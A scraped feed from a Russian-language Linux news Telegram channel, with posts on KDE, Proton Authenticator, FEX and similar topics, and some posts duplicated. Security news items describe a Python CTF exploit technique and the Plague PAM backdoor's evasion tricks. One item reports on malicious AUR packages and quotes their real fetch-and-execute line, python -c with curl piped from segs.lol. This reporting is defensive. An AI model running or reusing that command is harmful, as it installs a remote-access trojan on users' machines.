Онлайн-проект для проверки для каких дистрибутивов и версий доступен тот или иной пакет
📌 https://repology.org
Linux / Линукс🥸
📌 https://repology.org
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21
В AUR снова засветились вредоносные пакеты: уже 6 новых случаев
В репозитории AUR для Arch Linux обнаружены сразу шесть новых вредоносных пакетов, внедряющих трояны через PKGBUILD-скрипты. На этот раз под удар попали сборки браузеров и шрифтов, в том числе google-chrome-stable, chrome, chrome-bin, а также ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.
Во всех случаях в скриптах установки фигурировала строка вида: python -c "$(curl https://segs.lol/9wUb1Z)", которая подтягивала вредонос, распознанный как троян Spark. Он позволяет злоумышленнику получить удалённый доступ, управлять процессами, сливать файлы и делать скриншоты. Пакеты были оперативно удалены модераторами, но время их нахождения в AUR составляло от нескольких часов до суток.
Инцидент — продолжение атаки, начавшейся две недели назад, когда похожий код нашли в firefox-patch-bin, librewolf-fix-bin и других. Всё указывает на то, что злоумышленники систематически загружают вредонос под видом популярных пакетов, рассчитывая на доверие пользователей к AUR.
Linux / Линукс🥸
В репозитории AUR для Arch Linux обнаружены сразу шесть новых вредоносных пакетов, внедряющих трояны через PKGBUILD-скрипты. На этот раз под удар попали сборки браузеров и шрифтов, в том числе google-chrome-stable, chrome, chrome-bin, а также ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.
Во всех случаях в скриптах установки фигурировала строка вида: python -c "$(curl https://segs.lol/9wUb1Z)", которая подтягивала вредонос, распознанный как троян Spark. Он позволяет злоумышленнику получить удалённый доступ, управлять процессами, сливать файлы и делать скриншоты. Пакеты были оперативно удалены модераторами, но время их нахождения в AUR составляло от нескольких часов до суток.
Инцидент — продолжение атаки, начавшейся две недели назад, когда похожий код нашли в firefox-patch-bin, librewolf-fix-bin и других. Всё указывает на то, что злоумышленники систематически загружают вредонос под видом популярных пакетов, рассчитывая на доверие пользователей к AUR.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣26🤬9
Forwarded from godnoTECH - Новости IT
Apple сделала неожиданно тёплый жест в сторону Linux-сообщества: теперь на macOS Sequoia можно запускать Kali Linux — тот самый хакерский дистрибутив для пентестеров и специалистов по безопасности. Без виртуалок и двойной загрузки — всё работает через новый контейнерный фреймворк Container, а установка занимает пару команд в терминале.
Технология работает только на Apple Silicon (M1, M2 и дальше), и представляет собой аналог WSL2: внутри macOS запускается изолированная виртуальная среда с Linux. Всё на базе нативной виртуализации Apple, без сторонних гипервизоров. Kali тянется с DockerHub и поднимается как обычный контейнер:
container run --rm -it kalilinux/kali-rolling
.Please open Telegram to view this post
VIEW IN TELEGRAM
❤20😁9👍8
В KDE появилось автоматическое переключение между дневными и ночными темами оформления
Нейт Грэм (Nate Graham), разработчик, занимающийся контролем качества в проекте KDE, опубликовал очередной отчёт о разработке KDE. Среди недавних изменений в кодовой базе, формирующей будущий релиз KDE Plasma 6.5, намеченный на 16 октября:
Linux / Линукс🥸
Нейт Грэм (Nate Graham), разработчик, занимающийся контролем качества в проекте KDE, опубликовал очередной отчёт о разработке KDE. Среди недавних изменений в кодовой базе, формирующей будущий релиз KDE Plasma 6.5, намеченный на 16 октября:
— Добавлена поддержка автоматического переключения в ночное время на отдельно выбранную тёмную тему оформления.
— В конфирутаторе предоставлена возможность выбора глобальных тем оформления, которые будут доступны для переключения на странице быстрого изменения настроек (Quick Settings). На страницу быстрого изменения настроек также добавлена опция для автоматического переключения между дневной и ночной темами.
— Добавлена настройка для показа только светлых или только тёмных вариантов обоев рабочего стола. Также предоставлены опции для включения динамического изменения цвета обоев на основе выбранной цветовой схемы или времени дня, а также закрепления светлого или тёмного вариантов.
— При использовании Wayland обеспечено раскрытие существующих окон при открытии через KRunner файлов в уже запущенных приложениях.
— При использовании Wayland в экранном ридере Orca реализовано распознание состояния режима Caps Lock.
— Настройки обработчиков, вызываемых при переводе указателя к краю экрана (Screen Edges), перенесены в группу настроек дисплея.
— Добавлена поддержка перехода в спящий режим (suspend to disk) с экрана входа в систему на базе SDDM (ранее поддерживался только ждущий режим - suspend to ram).
— В кодовой базе, на основе которой будет сформирован корректирующий выпуск Plasma 6.4.4, устранены ошибки, приводившие к зависанию Plasma при выводе большой порции уведомлений с изображениями, и аварийному завершению при возникновения сбоев во время загрузки плагинов.
— В Qt 6.8.4 устранена ошибка, из-за которой композитный менеджер KWin потреблял слишком много ресурсов CPU в окружении X11 при блокировке или выключении экрана.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍26❤6🔥3
Please open Telegram to view this post
VIEW IN TELEGRAM
💔51❤3
Представлен Proton Authenticator, генератор одноразовых паролей для двухфакторной аутентификации
Швейцарская компания Proton AG представила открытое приложение Proton Authenticator, предназначенное для аутентификации при помощи одноразовых паролей с ограниченным сроком действия, генерируемых при помощи алгоритма TOTP (Time-based One-Time Password). Proton Authenticator может применяться как более функциональная замена проприетарным аутентификаторам, таким как Google Authenticator, Microsoft Authenticator, Authy и Duo, а также в качестве альтернативы открытым проектам FreeOTP и oathtool. Код Proton Authenticator распространяется под лицензией GPLv3. Доступны как мобильные приложения для Android и iOS, так и настольные программы для Linux, macOS и Windows. При разработке в зависимости от платформы применяются языки Kotlin, Swift и Rust.
Алгоритм TOTP позволяет генерировать на локальном устройстве пользователя одноразовые коды подтверждения и проверять их на внешнем сервере, используя в качестве параметров секретный ключ и текущее время. Для генерации пароля обмен данными между клиентом и сервером не требуется (достаточно один раз инициализировать ключ, распознав показанный сервером QR-код или импортировав ключ вручную). Время жизни одноразового пароля обычно ограничивается 30 секундами, после чего требуется генерация нового пароля. Пароль генерируется путём вычисления хэша SHA-1, SHA-256 или SHA-512 над сочетанием из ключа и очередного интервала времени, и использования нескольких младших битов хэша для выделения проверочных цифр.
Linux / Линукс🥸
Швейцарская компания Proton AG представила открытое приложение Proton Authenticator, предназначенное для аутентификации при помощи одноразовых паролей с ограниченным сроком действия, генерируемых при помощи алгоритма TOTP (Time-based One-Time Password). Proton Authenticator может применяться как более функциональная замена проприетарным аутентификаторам, таким как Google Authenticator, Microsoft Authenticator, Authy и Duo, а также в качестве альтернативы открытым проектам FreeOTP и oathtool. Код Proton Authenticator распространяется под лицензией GPLv3. Доступны как мобильные приложения для Android и iOS, так и настольные программы для Linux, macOS и Windows. При разработке в зависимости от платформы применяются языки Kotlin, Swift и Rust.
Алгоритм TOTP позволяет генерировать на локальном устройстве пользователя одноразовые коды подтверждения и проверять их на внешнем сервере, используя в качестве параметров секретный ключ и текущее время. Для генерации пароля обмен данными между клиентом и сервером не требуется (достаточно один раз инициализировать ключ, распознав показанный сервером QR-код или импортировав ключ вручную). Время жизни одноразового пароля обычно ограничивается 30 секундами, после чего требуется генерация нового пароля. Пароль генерируется путём вычисления хэша SHA-1, SHA-256 или SHA-512 над сочетанием из ключа и очередного интервала времени, и использования нескольких младших битов хэша для выделения проверочных цифр.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣47😎9😁4
FEX 2508: эмулятор x86 теперь быстрее на ARM и даже тянет Cyberpunk
Вышел новый релиз FEX 2508 — эмулятора, позволяющего запускать x86 и x86-64 приложения на Linux-системах с ARM64 (AArch64). Его активно использует проект Asahi Linux, чтобы гнать Steam-игры на Apple Silicon. Код на C++ с ассемблером, лицензия MIT.
Вместо chroot используется overlay-прослойка с rootfs в формате SquashFS. Всё нужное подтягивается утилитой FEXRootFSFetcher. Звук, графика и системные вызовы прокидываются через специальные thunk-библиотеки — поддерживаются OpenGL, Vulkan, SDL2, X11, ALSA и пр. Работает даже bidirectional — часть API можно пробрасывать и обратно.
Что нового:
— FPS в Cyberpunk 2077 вырос на 38.9%, в Doom 2016 — на 30.9%, Stray — на 25%, Grim Fandango Remastered — почти на 25%, Teardown — на 12.6%.
— Улучшили JIT-компиляцию, оптимизировали call-return и память под TSO (Total Store Ordering), что особенно актуально для Apple M1/M2.
— Добавили поддержку NX-бита, теперь исполняемый код не полетит из любой дырки в памяти.
— Повысилась устойчивость к антиотладке в старых играх вроде Crysis 2 и Peggle Deluxe.
Linux / Линукс🥸
Вышел новый релиз FEX 2508 — эмулятора, позволяющего запускать x86 и x86-64 приложения на Linux-системах с ARM64 (AArch64). Его активно использует проект Asahi Linux, чтобы гнать Steam-игры на Apple Silicon. Код на C++ с ассемблером, лицензия MIT.
Вместо chroot используется overlay-прослойка с rootfs в формате SquashFS. Всё нужное подтягивается утилитой FEXRootFSFetcher. Звук, графика и системные вызовы прокидываются через специальные thunk-библиотеки — поддерживаются OpenGL, Vulkan, SDL2, X11, ALSA и пр. Работает даже bidirectional — часть API можно пробрасывать и обратно.
Что нового:
— FPS в Cyberpunk 2077 вырос на 38.9%, в Doom 2016 — на 30.9%, Stray — на 25%, Grim Fandango Remastered — почти на 25%, Teardown — на 12.6%.
— Улучшили JIT-компиляцию, оптимизировали call-return и память под TSO (Total Store Ordering), что особенно актуально для Apple M1/M2.
— Добавили поддержку NX-бита, теперь исполняемый код не полетит из любой дырки в памяти.
— Повысилась устойчивость к антиотладке в старых играх вроде Crysis 2 и Peggle Deluxe.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍24❤6
Please open Telegram to view this post
VIEW IN TELEGRAM
😁36👍12❤1
Python-скрипт запускал комментарии, но не так, как ожидалось
На CTF-соревновании UIUCTF 2025 участнику удалось выполнить произвольный код на сервере, несмотря на то, что он мог менять только содержимое комментария в Python-скрипте. Казалось бы, надёжно: никакого eval, спецсимволы \n и \r вырезаются, данные помещаются в # комментарий, а затем скрипт запускается как .py. Но не всё так просто.
Уязвимость не в синтаксисе Python, а в его механике запуска файлов. Python с версии 2.6 умеет выполнять ZIP-архивы, если в них есть __main__.py. Причём архив может иметь расширение .py — Python определяет ZIP не по имени файла, а по структуре. Индексация архива идёт не с начала, а с конца — по секции EOCD, в которой можно хранить произвольный комментарий.
Именно это и использовал участник: подставил структурированный zip-архив прямо в текст комментария, где в конце файла лежал __main__.py со зловредом. Даже строка print("Thanks for playing!") после комментария не мешала — её Python игнорирует, считая частью ZIP-комментария.
Этот баг не связан с недавно закрытой уязвимостью с \0, но эксплуатирует аналогичную идею: исполнение "данных", маскирующихся под код.
Linux / Линукс🥸
На CTF-соревновании UIUCTF 2025 участнику удалось выполнить произвольный код на сервере, несмотря на то, что он мог менять только содержимое комментария в Python-скрипте. Казалось бы, надёжно: никакого eval, спецсимволы \n и \r вырезаются, данные помещаются в # комментарий, а затем скрипт запускается как .py. Но не всё так просто.
Уязвимость не в синтаксисе Python, а в его механике запуска файлов. Python с версии 2.6 умеет выполнять ZIP-архивы, если в них есть __main__.py. Причём архив может иметь расширение .py — Python определяет ZIP не по имени файла, а по структуре. Индексация архива идёт не с начала, а с конца — по секции EOCD, в которой можно хранить произвольный комментарий.
Именно это и использовал участник: подставил структурированный zip-архив прямо в текст комментария, где в конце файла лежал __main__.py со зловредом. Даже строка print("Thanks for playing!") после комментария не мешала — её Python игнорирует, считая частью ZIP-комментария.
Этот баг не связан с недавно закрытой уязвимостью с \0, но эксплуатирует аналогичную идею: исполнение "данных", маскирующихся под код.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18🤔1🌚1
Linux / Линукс
В AUR снова засветились вредоносные пакеты: уже 6 новых случаев В репозитории AUR для Arch Linux обнаружены сразу шесть новых вредоносных пакетов, внедряющих трояны через PKGBUILD-скрипты. На этот раз под удар попали сборки браузеров и шрифтов, в том числе…
Please open Telegram to view this post
VIEW IN TELEGRAM
👍30😁15😢7
Чат в терминале Linux: почти «Матрица» в реальной жизни
В статье рассказывается о том, как создать защищённое текстовое общение в духе «Матрицы» — без серверов и доверия, используя инструменты типа Cryptcat.
📌 https://habr.com/ru/companies/ru_mts/articles/900928/
Linux / Линукс🥸
В статье рассказывается о том, как создать защищённое текстовое общение в духе «Матрицы» — без серверов и доверия, используя инструменты типа Cryptcat.
📌 https://habr.com/ru/companies/ru_mts/articles/900928/
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤1
В рамках оптимизации Ubuntu Server 25.10 разработчики приняли решение убрать
wget
из стандартной установки. Вместо него для базовых задач теперь будет использоваться wcurl
, который предлагает схожую функциональность. Сам пакет wget
не удален из репозиториев, а просто перемещен в категорию поддерживаемых.Это часть более широкой кампании по зачистке, т.к. из этой же сборки удалили терминальные мультиплексоры
byobu
и screen
, оставив только tmux
. Разработчики считают, что раз в новой версии curl
(8.14.x) появилась обертка wcurl
, способная заменить wget
в большинстве простых сценариев, то нет смысла держать два инструмента с похожими задачами.Технически,
wcurl
обертка, которая транслирует базовые команды wget
в их эквиваленты для curl
. Она умеет скачивать файлы, следовать редиректам, автоматически подбирать имена файлов, избегать перезаписи и выполнять повторные попытки при сбое. Однако для более сложных сценариев, особенно в старых скриптах с множеством специфичных флагов, все еще придется ставить wget
вручную.Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣17🤔10😁4👍2🫡2
Невидимый бэкдор Plague атакует Linux-серверы через PAM
Исследователи из Nextron Systems обнаружили новый изощренный бэкдор для Linux под названием Plague. За последний год на VirusTotal было загружено несколько его вариантов, и ни один из них не был обнаружен ни одним из 66 антивирусных движков (рейтинг детекта 0/66).
Такая неуловимость достигается за счет глубокой интеграции в систему. Plague маскируется под легитимный модуль PAM (Pluggable Authentication Modules), встраиваясь в самый корень процесса аутентификации в Linux. Вместо того чтобы ломать систему снаружи, он становится ее частью. Вредоносная библиотека (часто с именем
Plague использует многоуровневую обфускацию строк, которая эволюционировала от простого XOR до сложных алгоритмов, похожих на RC4. Вредонос также оснащен антиотладочными механизмами: он проверяет, что его имя файла не изменено, и что в переменных окружения отсутствует
Для персистентности в бэкдор зашит статический пароль, который позволяет атакующим входить в систему по SSH, обходя стандартную аутентификацию. После успешного входа Plague тщательно зачищает следы: обнуляет переменные окружения
После успешного обхода аутентификации вредонос выводит сообщение-пасхалку из культового фильма «Хакеры» (1995):
Linux / Линукс🥸
Исследователи из Nextron Systems обнаружили новый изощренный бэкдор для Linux под названием Plague. За последний год на VirusTotal было загружено несколько его вариантов, и ни один из них не был обнаружен ни одним из 66 антивирусных движков (рейтинг детекта 0/66).
Такая неуловимость достигается за счет глубокой интеграции в систему. Plague маскируется под легитимный модуль PAM (Pluggable Authentication Modules), встраиваясь в самый корень процесса аутентификации в Linux. Вместо того чтобы ломать систему снаружи, он становится ее частью. Вредоносная библиотека (часто с именем
libselinux.so.8
) подменяет собой легитимную и перехватывает функцию pam_sm_authenticate()
, получая доступ к логинам и паролям в открытом виде.Plague использует многоуровневую обфускацию строк, которая эволюционировала от простого XOR до сложных алгоритмов, похожих на RC4. Вредонос также оснащен антиотладочными механизмами: он проверяет, что его имя файла не изменено, и что в переменных окружения отсутствует
ld.so.preload
, что характерно для песочниц.Для персистентности в бэкдор зашит статический пароль, который позволяет атакующим входить в систему по SSH, обходя стандартную аутентификацию. После успешного входа Plague тщательно зачищает следы: обнуляет переменные окружения
SSH_CONNECTION
, SSH_CLIENT
, SSH_TTY
(чтобы скрыть IP и порт атакующего) и перенаправляет историю команд (HISTFILE
) в /dev/null
, не оставляя никаких записей в .bash_history
.После успешного обхода аутентификации вредонос выводит сообщение-пасхалку из культового фильма «Хакеры» (1995):
Uh. Mr. The Plague, sir? I think we have a hacker.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
Nextron-Systems
Plague: A Newly Discovered PAM-Based Backdoor for Linux - Nextron Systems
🌚16❤3👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
😁76
Please open Telegram to view this post
VIEW IN TELEGRAM
1😁53
Orbitiny Desktop 4: необычное окружение с Qt стало чуть удобнее
Вышел четвёртый экспериментальный релиз Orbitiny Desktop — среды рабочего стола на Qt, написанной с нуля на C++ и распространяемой под GPL. Проект старается совместить классический интерфейс (панель, меню, значки) с новыми UX-идеями, которые редко встречаются в других DE.
Большая часть изменений касается файлового менеджера Qutiny и взаимодействия с рабочим столом. Теперь:
— В описаниях точек монтирования отображаются реальные устройства (например, /dev/sdc1)
— Для них появились отдельные пиктограммы, и они видны в боковой панели
— В панель инструментов добавлена кнопка для быстрого доступа к точкам монтирования
— В диалоге удаления теперь видно полный путь до файла, а в свойствах — хэши и владельца
— Диалог переименования получил обновлённый внешний вид
Orbitiny по-прежнему экспериментальный, но двигается к полноценной DE для тех, кто хочет что-то отличное от GNOME и KDE, но с Qt и классическим поведением.
Linux / Линукс🥸
Вышел четвёртый экспериментальный релиз Orbitiny Desktop — среды рабочего стола на Qt, написанной с нуля на C++ и распространяемой под GPL. Проект старается совместить классический интерфейс (панель, меню, значки) с новыми UX-идеями, которые редко встречаются в других DE.
Большая часть изменений касается файлового менеджера Qutiny и взаимодействия с рабочим столом. Теперь:
— В описаниях точек монтирования отображаются реальные устройства (например, /dev/sdc1)
— Для них появились отдельные пиктограммы, и они видны в боковой панели
— В панель инструментов добавлена кнопка для быстрого доступа к точкам монтирования
— В диалоге удаления теперь видно полный путь до файла, а в свойствах — хэши и владельца
— Диалог переименования получил обновлённый внешний вид
Orbitiny по-прежнему экспериментальный, но двигается к полноценной DE для тех, кто хочет что-то отличное от GNOME и KDE, но с Qt и классическим поведением.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18❤3😎2🌚1